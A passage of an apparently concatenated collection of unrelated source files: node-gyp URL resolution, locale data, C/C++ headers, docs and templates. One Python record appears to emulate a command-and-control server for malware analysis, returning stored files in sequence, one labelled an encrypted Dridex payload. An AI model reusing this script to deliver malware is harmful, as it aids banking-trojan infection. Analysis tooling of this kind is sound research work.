/\\/win-(x86|x64)\\//\n , bitsreV3 = /\\/win-(x86|ia32|x64)\\// // io.js v3.x.x shipped 
with \"ia32\" but should\n // have been \"x86\"\n\n// Captures all the logic required to determine download URLs, local directory and \n// file names. Inputs come from command-line switches (--target, --dist-url),\n// `process.version` and `process.release` where it exists.\nfunction processRelease (argv, gyp, defaultVersion, defaultRelease) {\n var version = (semver.valid(argv[0]) && argv[0]) || gyp.opts.target || defaultVersion\n , versionSemver = semver.parse(version)\n , overrideDistUrl = gyp.opts['dist-url'] || gyp.opts.disturl\n , isDefaultVersion\n , isIojs\n , name\n , distBaseUrl\n , baseUrl\n , libUrl32\n , libUrl64\n , tarballUrl\n , canGetHeaders\n\n if (!versionSemver) {\n // not a valid semver string, nothing we can do\n return { version: version }\n }\n // flatten version into String\n version = versionSemver.version\n\n // defaultVersion should come from process.version so ought to be valid semver\n isDefaultVersion = version === semver.parse(defaultVersion).version\n\n // can't use process.release if we're using --target=x.y.z\n if (!isDefaultVersion)\n defaultRelease = null\n\n if (defaultRelease) {\n // v3 onward, has process.release\n name = defaultRelease.name.replace(/io\\.js/, 'iojs') // remove the '.' for directory naming purposes\n isIojs = name === 'iojs'\n } else {\n // old node or alternative --target=\n // semver.satisfies() doesn't like prerelease tags so test major directly\n isIojs = versionSemver.major >= 1 && versionSemver.major < 4\n name = isIojs ? 'iojs' : 'node'\n }\n\n // check for the nvm.sh standard mirror env variables\n if (!overrideDistUrl) {\n if (isIojs) {\n if (process.env.IOJS_ORG_MIRROR) {\n overrideDistUrl = process.env.IOJS_ORG_MIRROR\n } else if (process.env.NVM_IOJS_ORG_MIRROR) {// remove on next semver-major\n overrideDistUrl = process.env.NVM_IOJS_ORG_MIRROR\n log.warn('download',\n 'NVM_IOJS_ORG_MIRROR is deprecated and will be removed in node-gyp v4, ' +\n 'please use IOJS_ORG_MIRROR')\n }\n } else {\n if (process.env.NODEJS_ORG_MIRROR) {\n overrideDistUrl = process.env.NODEJS_ORG_MIRROR\n } else if (process.env.NVM_NODEJS_ORG_MIRROR) {// remove on next semver-major\n overrideDistUrl = process.env.NVM_NODEJS_ORG_MIRROR\n log.warn('download',\n 'NVM_NODEJS_ORG_MIRROR is deprecated and will be removed in node-gyp v4, ' +\n 'please use NODEJS_ORG_MIRROR')\n }\n }\n }\n\n if (overrideDistUrl)\n log.verbose('download', 'using dist-url', overrideDistUrl)\n\n if (overrideDistUrl)\n distBaseUrl = overrideDistUrl.replace(/\\/+$/, '')\n else\n distBaseUrl = isIojs ? 'https://iojs.org/download/release' : 'https://nodejs.org/dist'\n distBaseUrl += '/v' + version + '/'\n\n // new style, based on process.release so we have a lot of the data we need\n if (defaultRelease && defaultRelease.headersUrl && !overrideDistUrl) {\n baseUrl = url.resolve(defaultRelease.headersUrl, './')\n libUrl32 = resolveLibUrl(name, defaultRelease.libUrl || baseUrl || distBaseUrl, 'x86', versionSemver.major)\n libUrl64 = resolveLibUrl(name, defaultRelease.libUrl || baseUrl || distBaseUrl, 'x64', versionSemver.major)\n\n return {\n version: version,\n semver: versionSemver,\n name: name,\n baseUrl: baseUrl,\n tarballUrl: defaultRelease.headersUrl,\n shasumsUrl: url.resolve(baseUrl, 'SHASUMS256.txt'),\n versionDir: (name !== 'node' ? 
name + '-' : '') + version,\n libUrl32: libUrl32,\n libUrl64: libUrl64,\n libPath32: normalizePath(path.relative(url.parse(baseUrl).path, url.parse(libUrl32).path)),\n libPath64: normalizePath(path.relative(url.parse(baseUrl).path, url.parse(libUrl64).path))\n }\n }\n\n // older versions without process.release are captured here and we have to make\n // a lot of assumptions, additionally if you --target=x.y.z then we can't use the\n // current process.release\n\n baseUrl = distBaseUrl\n libUrl32 = resolveLibUrl(name, baseUrl, 'x86', versionSemver.major)\n libUrl64 = resolveLibUrl(name, baseUrl, 'x64', versionSemver.major)\n // making the bold assumption that anything with a version number >3.0.0 will\n // have a *-headers.tar.gz file in its dist location, even some frankenstein\n // custom version\n canGetHeaders = semver.satisfies(versionSemver, headersTarballRange)\n tarballUrl = url.resolve(baseUrl, name + '-v' + version + (canGetHeaders ? '-headers' : '') + '.tar.gz')\n\n return {\n version: version,\n semver: versionSemver,\n name: name,\n baseUrl: baseUrl,\n tarballUrl: tarballUrl,\n shasumsUrl: url.resolve(baseUrl, 'SHASUMS256.txt'),\n versionDir: (name !== 'node' ? name + '-' : '') + version,\n libUrl32: libUrl32,\n libUrl64: libUrl64,\n libPath32: normalizePath(path.relative(url.parse(baseUrl).path, url.parse(libUrl32).path)),\n libPath64: normalizePath(path.relative(url.parse(baseUrl).path, url.parse(libUrl64).path))\n }\n}\n\nfunction normalizePath (p) {\n return path.normalize(p).replace(/\\\\/g, '/')\n}\n\nfunction resolveLibUrl (name, defaultUrl, arch, versionMajor) {\n var base = url.resolve(defaultUrl, './')\n , hasLibUrl = bitsre.test(defaultUrl) || (versionMajor === 3 && bitsreV3.test(defaultUrl))\n\n if (!hasLibUrl) {\n // let's assume it's a baseUrl then\n if (versionMajor >= 1)\n return url.resolve(base, 'win-' + arch +'/' + name + '.lib')\n // prior to io.js@1.0.0 32-bit node.lib lives in /, 64-bit lives in /x64/\n return url.resolve(base, (arch === 'x64' ? 'x64/' : '') + name + '.lib')\n }\n\n // else we have a proper url to a .lib, just make sure it's the right arch\n return defaultUrl.replace(versionMajor === 3 ? 
bitsreV3 : bitsre, '/win-' + arch + '/')\n}\n\nmodule.exports = processRelease\n"} {"text": "/*\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage net.consensys.eventeum.integration.mixin;\n\nimport com.fasterxml.jackson.databind.annotation.JsonDeserialize;\n\n@JsonDeserialize(as = SimplePageImpl.class)\npublic interface PageMixIn {\n}\n"} {"text": "- contribution = @notification.contribution\n- details = contribution.details.first\n\n|Olá, #{contribution.user.display_name}!\nbr\nbr\n| Infelizmente o projeto #{link_to(contribution.project.name, project_by_slug_url(permalink: contribution.project.permalink))} que você apoiou não atingiu a meta estabelecida no #{CatarseSettings[:company_name]}.\nbr\nbr\n| Em até 5 dias úteis faremos o reembolso do valor do seu apoio, que virá como crédito na próxima ou \n| subsequente fatura do seu cartão. Assim que o reembolso for feito, você receberá um e-mail de confirmação da operação.\nbr\nbr\np Valor do reembolso: #{number_to_currency details.value}\n\np Data do pedido reembolso: #{details.pending_refund_at.try(:to_date)}\n\np Identificação na fatura do cartão de crédito: “Estorno do Catarse”\n\n= render partial: 'user_notifier/mailer/contact_info'\n"} {"text": "import cv2\n\ndef min_resize(x, size, interpolation=cv2.INTER_LINEAR):\n \"\"\"\n Resize an image so that it is size along the minimum spatial dimension.\n \"\"\"\n w, h = map(float, x.shape[:2])\n if min([w, h]) != size:\n if w <= h:\n x = cv2.resize(x, (int(round((h/w)*size)), int(size)), interpolation=interpolation)\n else:\n x = cv2.resize(x, (int(size), int(round((w/h)*size))), interpolation=interpolation)\n return x"} {"text": "package pkg;\n\npublic final class TestFieldSingleAccess {\n public Integer field;\n\n public final void test() {\n Integer var10000 = this.field;\n if (var10000 != null) {\n System.out.println(var10000);\n }\n\n }\n\n public final void test1() {\n synchronized(this.field) {\n System.out.println('1');\n }\n }\n}\n\nclass 'pkg/TestFieldSingleAccess' {\n method 'test ()V' {\n 1 6\n 5 7\n 8 8\n c 8\n f 11\n }\n\n method 'test1 ()V' {\n 1 14\n 6 14\n 7 15\n a 15\n c 15\n 19 17\n }\n}\n\nLines mapping:\n"} {"text": "---\ndescription: All tasks are filed as issues in github.\n---\n\n# Track and submit issues in Github\n\n## Track issues in Github\n\nWe log all our issues concerning development and documentation for the Ushahidi Platform in the [Platform-repository](https://github.com/ushahidi/platform/issues). 
Issues marked with [Community-task](https://github.com/ushahidi/platform/labels/Community%20Task) are issues that are up for grabs for any community-member.\n\n## Submit issues in GitHub\n\nTo submit issues in GitHub for the Ushahidi Platform, please go to [https://github.com/ushahidi/platform/issues](https://github.com/ushahidi/platform/issues) and click on the \"New Issue\" button, _or_ follow [this link](https://github.com/ushahidi/platform/issues/new/choose).\n\n[![New Issue button in GitHub](https://user-images.githubusercontent.com/2434401/62314495-8a844200-b469-11e9-8439-27ed03ea43c4.png)](https://user-images.githubusercontent.com/2434401/62314495-8a844200-b469-11e9-8439-27ed03ea43c4.png)\n\nYou will see a list of options for which type of issue you'd like to submit. \n[![Screen Shot 2019-08-01 at 14 36 16](https://user-images.githubusercontent.com/2434401/62314594-c3241b80-b469-11e9-8b62-115ea30cc150.png)](https://user-images.githubusercontent.com/2434401/62314594-c3241b80-b469-11e9-8b62-115ea30cc150.png) \nThe options:\n\n* **Bug report:** If you want to report something that is broken or not working as intended, please file a Bug Report. A good bug report is descriptive and reproducible.\n* **Feature/enhancement request:** Suggest an idea for a new feature or a small enhancement to existing features. This can be something as big as \"Add a new way to import data into the Ushahidi Platform\" or as small as \"Change the font size of the login button to make it easier to use\".\n* **Epic level spec**: this is only used when you want to create a very large request that encompasses multiple tickets and is likely to require a lot of work. It is primarily used by the Ushahidi team to group work together and plan for it, so you can ignore it for now.\n\nFor each of the options, when you click it you will be taken to a screen where you can fill in answers to our questions to submit a new issue. Please take the time to fill in all the required fields, as this will increase the chances that your issue will be understood quickly by both staff and community members, and it will also help us triage it correctly. \n[![Screen Shot 2019-08-01 at 14 44 10](https://user-images.githubusercontent.com/2434401/62315024-d7b4e380-b46a-11e9-9829-b737d9d89217.png)](https://user-images.githubusercontent.com/2434401/62315024-d7b4e380-b46a-11e9-9829-b737d9d89217.png)\n\n**Important:** _Do not add tags to issues unless you are a maintainer._ A maintainer will tag issues during triage, and add any staff or community members that need to be aware of the issue immediately.\n\nOnce you have filled all the requirements for the issue to be submitted, you can click \"Submit new Issue\" and your issue will be created. **This triggers a notification to one Ushahidi staff who will review it as soon as possible.** \n[![Screen Shot 2019-08-01 at 14 47 50](https://user-images.githubusercontent.com/2434401/62315262-5b6ed000-b46b-11e9-993f-6ad654d8e138.png)](https://user-images.githubusercontent.com/2434401/62315262-5b6ed000-b46b-11e9-993f-6ad654d8e138.png)\n\nThank you for reading our guide to submitting a new issue to the Ushahidi Platform. 
We look forward to hearing from you!\n\n"} {"text": "import base64\nimport os\nfrom os.path import dirname, abspath\n\n################################\nstate_file_mappping = {\n\t0: \"48e79c2413bd1090c3e99bce786bc4b33f0f632d\", #download instruction??\n\t1: \"dfef1067c4c404be770adbfc4c7c23204b69d3bb\", #encrypted Dridex payload\n\t2: \"0f6ed930dfae0b4f093a01cd1838b29756c9aa0c\", #ping response??\n\t3: \"0f6ed930dfae0b4f093a01cd1838b29756c9aa0c\" #ping response??\n}\n################################\n\nscript_directory=dirname(abspath(__file__))\nstate_file=script_directory+\"\\\\state.txt\"\n\ndef print_file_contents(fileName):\n\tfileContents=\"\"\n\twith open(script_directory+\"\\\\\"+fileName, mode='rb') as file:\n\t\tprint base64.b64encode(file.read())\n\nstate=0\nif os.path.isfile(state_file):\n\twith open(state_file) as file:\n\t\tstate=int(file.readline())\n\nprint_file_contents(state_file_mappping.get(state))\n\nwith open(state_file, \"w\") as file:\n\tfile.write(str(state+1))"} {"text": "'use strict';\nangular.module(\"ngLocale\", [], [\"$provide\", function($provide) {\nvar PLURAL_CATEGORY = {ZERO: \"zero\", ONE: \"one\", TWO: \"two\", FEW: \"few\", MANY: \"many\", OTHER: \"other\"};\n$provide.value(\"$locale\", {\n \"DATETIME_FORMATS\": {\n \"AMPMS\": [\n \"PG\",\n \"PTG\"\n ],\n \"DAY\": [\n \"Ahad\",\n \"Isnin\",\n \"Selasa\",\n \"Rabu\",\n \"Khamis\",\n \"Jumaat\",\n \"Sabtu\"\n ],\n \"ERANAMES\": [\n \"S.M.\",\n \"TM\"\n ],\n \"ERAS\": [\n \"S.M.\",\n \"TM\"\n ],\n \"FIRSTDAYOFWEEK\": 0,\n \"MONTH\": [\n \"Januari\",\n \"Februari\",\n \"Mac\",\n \"April\",\n \"Mei\",\n \"Jun\",\n \"Julai\",\n \"Ogos\",\n \"September\",\n \"Oktober\",\n \"November\",\n \"Disember\"\n ],\n \"SHORTDAY\": [\n \"Ahd\",\n \"Isn\",\n \"Sel\",\n \"Rab\",\n \"Kha\",\n \"Jum\",\n \"Sab\"\n ],\n \"SHORTMONTH\": [\n \"Jan\",\n \"Feb\",\n \"Mac\",\n \"Apr\",\n \"Mei\",\n \"Jun\",\n \"Jul\",\n \"Ogo\",\n \"Sep\",\n \"Okt\",\n \"Nov\",\n \"Dis\"\n ],\n \"STANDALONEMONTH\": [\n \"Januari\",\n \"Februari\",\n \"Mac\",\n \"April\",\n \"Mei\",\n \"Jun\",\n \"Julai\",\n \"Ogos\",\n \"September\",\n \"Oktober\",\n \"November\",\n \"Disember\"\n ],\n \"WEEKENDRANGE\": [\n 5,\n 6\n ],\n \"fullDate\": \"dd MMMM y\",\n \"longDate\": \"d MMMM y\",\n \"medium\": \"d MMM y h:mm:ss a\",\n \"mediumDate\": \"d MMM y\",\n \"mediumTime\": \"h:mm:ss a\",\n \"short\": \"d/MM/yy h:mm a\",\n \"shortDate\": \"d/MM/yy\",\n \"shortTime\": \"h:mm a\"\n },\n \"NUMBER_FORMATS\": {\n \"CURRENCY_SYM\": \"$\",\n \"DECIMAL_SEP\": \",\",\n \"GROUP_SEP\": \".\",\n \"PATTERNS\": [\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"maxFrac\": 3,\n \"minFrac\": 0,\n \"minInt\": 1,\n \"negPre\": \"-\",\n \"negSuf\": \"\",\n \"posPre\": \"\",\n \"posSuf\": \"\"\n },\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"maxFrac\": 2,\n \"minFrac\": 2,\n \"minInt\": 1,\n \"negPre\": \"-\\u00a4\\u00a0\",\n \"negSuf\": \"\",\n \"posPre\": \"\\u00a4\\u00a0\",\n \"posSuf\": \"\"\n }\n ]\n },\n \"id\": \"ms-latn-bn\",\n \"localeID\": \"ms_Latn_BN\",\n \"pluralCat\": function(n, opt_precision) { return PLURAL_CATEGORY.OTHER;}\n});\n}]);\n"} {"text": "/**************************************************************************\n *\n * Etherboot driver for Level 5 Etherfabric network cards\n *\n * Written by Michael Brown \n *\n * Copyright Fen Systems Ltd. 2005\n * Copyright Level 5 Networks Inc. 2005\n *\n * This software may be used and distributed according to the terms of\n * the GNU General Public License (GPL), incorporated herein by\n * reference. 
Drivers based on or derived from this code fall under\n * the GPL and must retain the authorship, copyright and license\n * notice.\n *\n **************************************************************************\n */\n\nFILE_LICENCE ( GPL_ANY );\n\n#ifndef EFAB_NIC_H\n#define EFAB_NIC_H\n#include \n#include \n#include \n#include \n#include \n/**************************************************************************\n *\n * Constants and macros\n *\n **************************************************************************\n */\n/* Board IDs. Early boards have no board_type, (e.g. EF1002 and 401/403)\n * But newer boards are getting bigger...\n */\ntypedef enum {\n\tEFAB_BOARD_INVALID = 0, /* Early boards do not have board rev. info. */\n\tEFAB_BOARD_SFE4001 = 1,\n\tEFAB_BOARD_SFE4002 = 2,\n\tEFAB_BOARD_SFE4003 = 3,\n\t/* Insert new types before here */\n\tEFAB_BOARD_MAX\n} efab_board_type;\n\n/* PHY types. */\ntypedef enum {\n\tPHY_TYPE_AUTO = 0, /* on development board detect between CX4 & alaska */\n\tPHY_TYPE_CX4_RTMR = 1,\n\tPHY_TYPE_1GIG_ALASKA = 2,\n\tPHY_TYPE_10XPRESS = 3,\n\tPHY_TYPE_XFP = 4,\n\tPHY_TYPE_CX4 = 5,\n\tPHY_TYPE_PM8358 = 6,\n} phy_type_t;\n\n/**************************************************************************\n *\n * Hardware data structures and sizing\n *\n **************************************************************************\n */\n\n#define dma_addr_t unsigned long\ntypedef efab_qword_t falcon_rx_desc_t;\ntypedef efab_qword_t falcon_tx_desc_t;\ntypedef efab_qword_t falcon_event_t;\n\n#define EFAB_BUF_ALIGN\t\t4096\n#define EFAB_RXD_SIZE\t\t512\n#define EFAB_TXD_SIZE\t\t512\n#define EFAB_EVQ_SIZE\t\t512\n\n#define EFAB_NUM_RX_DESC 16\n#define EFAB_RX_BUF_SIZE\t1600\n\n/**************************************************************************\n *\n * Data structures\n *\n **************************************************************************\n */\n\nstruct efab_nic;\n\n/* A buffer table allocation backing a tx dma, rx dma or eventq */\nstruct efab_special_buffer {\n\tdma_addr_t dma_addr;\n\tint id;\n};\n\n/* A TX queue */\nstruct efab_tx_queue {\n\t/* The hardware ring */\n\tfalcon_tx_desc_t *ring;\n\n\t/* The software ring storing io_buffers. 
*/\n\tstruct io_buffer *buf[EFAB_TXD_SIZE];\n\n\t/* The buffer table reservation pushed to hardware */\n\tstruct efab_special_buffer entry;\n\n\t/* Software descriptor write ptr */\n\tunsigned int write_ptr;\n\n\t/* Hardware descriptor read ptr */\n\tunsigned int read_ptr;\n};\n\n/* An RX queue */\nstruct efab_rx_queue {\n\t/* The hardware ring */\n\tfalcon_rx_desc_t *ring;\n\n\t/* The software ring storing io_buffers */\n\tstruct io_buffer *buf[EFAB_NUM_RX_DESC];\n\n\t/* The buffer table reservation pushed to hardware */\n\tstruct efab_special_buffer entry;\n\n\t/* Descriptor write ptr, into both the hardware and software rings */\n\tunsigned int write_ptr;\n\n\t/* Hardware completion ptr */\n\tunsigned int read_ptr;\n};\n\n/* An event queue */\nstruct efab_ev_queue {\n\t/* The hardware ring to push to hardware.\n\t * Must be the first entry in the structure */\n\tfalcon_event_t *ring;\n\n\t/* The buffer table reservation pushed to hardware */\n\tstruct efab_special_buffer entry;\n\n\t/* Pointers into the ring */\n\tunsigned int read_ptr;\n};\n\nstruct efab_mac_operations {\n\tint ( * init ) ( struct efab_nic *efab );\n};\n\nstruct efab_phy_operations {\n\tint ( * init ) ( struct efab_nic *efab );\n\tunsigned int mmds;\n};\n\nstruct efab_board_operations {\n\tint ( * init ) ( struct efab_nic *efab );\n\tvoid ( * fini ) ( struct efab_nic *efab );\n};\n\nstruct efab_nic {\n\tstruct net_device *netdev;\n\tint pci_revision;\n\tint is_asic;\n\n\t/* I2C bit-bashed interface */\n\tstruct i2c_bit_basher i2c_bb;\n\n\t/** SPI bus and devices, and the user visible NVO area */\n\tstruct spi_bus spi_bus;\n\tstruct spi_device spi_flash;\n\tstruct spi_device spi_eeprom;\n\tstruct spi_device *spi;\n\tstruct nvo_block nvo;\n\n\t/** Board, MAC, and PHY operations tables */\n\tstruct efab_board_operations *board_op;\n\tstruct efab_mac_operations *mac_op;\n\tstruct efab_phy_operations *phy_op;\n\n\t/* PHY and board types */\n\tint phy_addr;\n\tint phy_type;\n\tint phy_10g;\n\tint board_type;\n\n\t/** Memory and IO base */\n\tvoid *membase;\n\tunsigned int iobase;\n\n\t/* Buffer table allocation head */\n\tint buffer_head;\n\n\t/* Queues */\n\tstruct efab_rx_queue rx_queue;\n\tstruct efab_tx_queue tx_queue;\n\tstruct efab_ev_queue ev_queue;\n\n\t/** MAC address */\n\tuint8_t mac_addr[ETH_ALEN];\n\t/** GMII link options */\n\tunsigned int link_options;\n\t/** Link status */\n\tint link_up;\n\n\t/** INT_REG_KER */\n\tefab_oword_t int_ker __attribute__ (( aligned ( 16 ) ));\n};\n#endif /* EFAB_NIC_H */\n\n"} {"text": "/****************************************************************************\nCopyright (c) 2010-2012 cocos2d-x.org\nCopyright (c) 2009-2010 Ricardo Quesada\nCopyright (c) 2011 Zynga Inc.\n\nhttp://www.cocos2d-x.org\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n****************************************************************************/\n#ifndef __CCTMX_TILE_MAP_H__\n#define __CCTMX_TILE_MAP_H__\n\n#include \"base_nodes/CCNode.h\"\n#include \"CCTMXObjectGroup.h\"\n\nNS_CC_BEGIN\n\nclass CCTMXObjectGroup;\nclass CCTMXLayer;\nclass CCTMXLayerInfo;\nclass CCTMXTilesetInfo;\nclass CCTMXMapInfo;\n\n/**\n * @addtogroup tilemap_parallax_nodes\n * @{\n */\n\n/** Possible orientations of the TMX map */\nenum\n{\n /** Orthogonal orientation */\n CCTMXOrientationOrtho,\n\n /** Hexagonal orientation */\n CCTMXOrientationHex,\n\n /** Isometric orientation */\n CCTMXOrientationIso,\n};\n\n/** @brief CCTMXTiledMap knows how to parse and render a TMX map.\n\nIt adds support for the TMX tiled map format used by http://www.mapeditor.org\nIt supports isometric, hexagonal and orthogonal tiles.\nIt also supports object groups, objects, and properties.\n\nFeatures:\n- Each tile will be treated as an CCSprite\n- The sprites are created on demand. They will be created only when you call \"layer->tileAt(position)\"\n- Each tile can be rotated / moved / scaled / tinted / \"opaqued\", since each tile is a CCSprite\n- Tiles can be added/removed in runtime\n- The z-order of the tiles can be modified in runtime\n- Each tile has an anchorPoint of (0,0)\n- The anchorPoint of the TMXTileMap is (0,0)\n- The TMX layers will be added as a child\n- The TMX layers will be aliased by default\n- The tileset image will be loaded using the CCTextureCache\n- Each tile will have a unique tag\n- Each tile will have a unique z value. top-left: z=1, bottom-right: z=max z\n- Each object group will be treated as an CCMutableArray\n- Object class which will contain all the properties in a dictionary\n- Properties can be assigned to the Map, Layer, Object Group, and Object\n\nLimitations:\n- It only supports one tileset per layer.\n- Embedded images are not supported\n- It only supports the XML format (the JSON format is not supported)\n\nTechnical description:\nEach layer is created using an CCTMXLayer (subclass of CCSpriteBatchNode). If you have 5 layers, then 5 CCTMXLayer will be created,\nunless the layer visibility is off. 
In that case, the layer won't be created at all.\nYou can obtain the layers (CCTMXLayer objects) at runtime by:\n- map->getChildByTag(tag_number); // 0=1st layer, 1=2nd layer, 2=3rd layer, etc...\n- map->layerNamed(name_of_the_layer);\n\nEach object group is created using a CCTMXObjectGroup which is a subclass of CCMutableArray.\nYou can obtain the object groups at runtime by:\n- map->objectGroupNamed(name_of_the_object_group);\n\nEach object is a CCTMXObject.\n\nEach property is stored as a key-value pair in an CCMutableDictionary.\nYou can obtain the properties at runtime by:\n\nmap->propertyNamed(name_of_the_property);\nlayer->propertyNamed(name_of_the_property);\nobjectGroup->propertyNamed(name_of_the_property);\nobject->propertyNamed(name_of_the_property);\n\n@since v0.8.1\n*/\nclass CC_DLL CCTMXTiledMap : public CCNode\n{\n /** the map's size property measured in tiles */\n CC_SYNTHESIZE_PASS_BY_REF(CCSize, m_tMapSize, MapSize);\n /** the tiles's size property measured in pixels */\n CC_SYNTHESIZE_PASS_BY_REF(CCSize, m_tTileSize, TileSize);\n /** map orientation */\n CC_SYNTHESIZE(int, m_nMapOrientation, MapOrientation);\n /** object groups */\n CC_PROPERTY(CCArray*, m_pObjectGroups, ObjectGroups);\n /** properties */\n CC_PROPERTY(CCDictionary*, m_pProperties, Properties);\npublic:\n CCTMXTiledMap();\n virtual ~CCTMXTiledMap();\n\n /** creates a TMX Tiled Map with a TMX file.\n @deprecated: This interface will be deprecated sooner or later.\n */\n CC_DEPRECATED_ATTRIBUTE static CCTMXTiledMap* tiledMapWithTMXFile(const char *tmxFile);\n\n /** initializes a TMX Tiled Map with a TMX formatted XML string and a path to TMX resources \n @deprecated: This interface will be deprecated sooner or later.\n */\n CC_DEPRECATED_ATTRIBUTE static CCTMXTiledMap* tiledMapWithXML(const char* tmxString, const char* resourcePath);\n\n /** creates a TMX Tiled Map with a TMX file.*/\n static CCTMXTiledMap* create(const char *tmxFile);\n\n /** initializes a TMX Tiled Map with a TMX formatted XML string and a path to TMX resources */\n static CCTMXTiledMap* createWithXML(const char* tmxString, const char* resourcePath);\n\n /** initializes a TMX Tiled Map with a TMX file */\n bool initWithTMXFile(const char *tmxFile);\n\n /** initializes a TMX Tiled Map with a TMX formatted XML string and a path to TMX resources */\n bool initWithXML(const char* tmxString, const char* resourcePath);\n\n /** return the TMXLayer for the specific layer */\n CCTMXLayer* layerNamed(const char *layerName);\n\n /** return the TMXObjectGroup for the specific group */\n CCTMXObjectGroup* objectGroupNamed(const char *groupName);\n\n /** return the value for the specific property name */\n CCString *propertyNamed(const char *propertyName);\n\n /** return properties dictionary for tile GID */\n CCDictionary* propertiesForGID(int GID);\n\nprivate:\n CCTMXLayer * parseLayer(CCTMXLayerInfo *layerInfo, CCTMXMapInfo *mapInfo);\n CCTMXTilesetInfo * tilesetForLayer(CCTMXLayerInfo *layerInfo, CCTMXMapInfo *mapInfo);\n void buildWithMapInfo(CCTMXMapInfo* mapInfo);\nprotected:\n //! tile properties\n CCDictionary* m_pTileProperties;\n\n};\n\n// end of tilemap_parallax_nodes group\n/// @}\n\nNS_CC_END\n\n#endif //__CCTMX_TILE_MAP_H__\n\n\n"} {"text": "/** @file\n\n A brief file description\n\n @section license License\n\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements. See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership. 
The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n */\n\n/****************************************************************************\n\n Basic Threads\n\n\n\n**************************************************************************/\n#include \"P_EventSystem.h\"\n#include \"tscore/ink_string.h\"\n\n///////////////////////////////////////////////\n// Common Interface impl //\n///////////////////////////////////////////////\n\nink_hrtime Thread::cur_time = ink_get_hrtime_internal();\ninkcoreapi ink_thread_key Thread::thread_data_key;\n\nnamespace\n{\nstatic bool initialized ATS_UNUSED = ([]() -> bool {\n // File scope initialization goes here.\n ink_thread_key_create(&Thread::thread_data_key, nullptr);\n return true;\n})();\n}\n\nThread::Thread()\n{\n mutex = new_ProxyMutex();\n MUTEX_TAKE_LOCK(mutex, static_cast(this));\n mutex->nthread_holding += THREAD_MUTEX_THREAD_HOLDING;\n}\n\nThread::~Thread()\n{\n ink_release_assert(mutex->thread_holding == static_cast(this));\n\n if (ink_thread_getspecific(Thread::thread_data_key) == this) {\n // Clear pointer to this object stored in thread-specific data by set_specific.\n //\n ink_thread_setspecific(Thread::thread_data_key, nullptr);\n }\n\n mutex->nthread_holding -= THREAD_MUTEX_THREAD_HOLDING;\n MUTEX_UNTAKE_LOCK(mutex, static_cast(this));\n}\n\n///////////////////////////////////////////////\n// Unix & non-NT Interface impl //\n///////////////////////////////////////////////\n\nstruct thread_data_internal {\n ThreadFunction f; ///< Function to execute in the thread.\n Thread *me; ///< The class instance.\n char name[MAX_THREAD_NAME_LENGTH]; ///< Name for the thread.\n};\n\nstatic void *\nspawn_thread_internal(void *a)\n{\n auto *p = static_cast(a);\n\n p->me->set_specific();\n ink_set_thread_name(p->name);\n\n if (p->f) {\n p->f();\n } else {\n p->me->execute();\n }\n\n delete p;\n return nullptr;\n}\n\nvoid\nThread::start(const char *name, void *stack, size_t stacksize, ThreadFunction const &f)\n{\n auto *p = new thread_data_internal{f, this, \"\"};\n\n ink_zero(p->name);\n ink_strlcpy(p->name, name, MAX_THREAD_NAME_LENGTH);\n if (stacksize == 0) {\n stacksize = DEFAULT_STACKSIZE;\n }\n ink_thread_create(&tid, spawn_thread_internal, p, 0, stacksize, stack);\n}\n"} {"text": "/*\nThis file is part of the iText (R) project.\nCopyright (c) 1998-2020 iText Group NV\nAuthors: Bruno Lowagie, Paulo Soares, et al.\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU Affero General Public License version 3\nas published by the Free Software Foundation with the addition of the\nfollowing permission added to Section 15 as permitted in Section 7(a):\nFOR ANY PART OF THE COVERED WORK IN WHICH THE COPYRIGHT IS OWNED BY\nITEXT GROUP. 
ITEXT GROUP DISCLAIMS THE WARRANTY OF NON INFRINGEMENT\nOF THIRD PARTY RIGHTS\n\nThis program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY\nor FITNESS FOR A PARTICULAR PURPOSE.\nSee the GNU Affero General Public License for more details.\nYou should have received a copy of the GNU Affero General Public License\nalong with this program; if not, see http://www.gnu.org/licenses or write to\nthe Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,\nBoston, MA, 02110-1301 USA, or download the license from the following URL:\nhttp://itextpdf.com/terms-of-use/\n\nThe interactive user interfaces in modified source and object code versions\nof this program must display Appropriate Legal Notices, as required under\nSection 5 of the GNU Affero General Public License.\n\nIn accordance with Section 7(b) of the GNU Affero General Public License,\na covered work must retain the producer line in every PDF that is created\nor manipulated using iText.\n\nYou can be released from the requirements of the license by purchasing\na commercial license. Buying such a license is 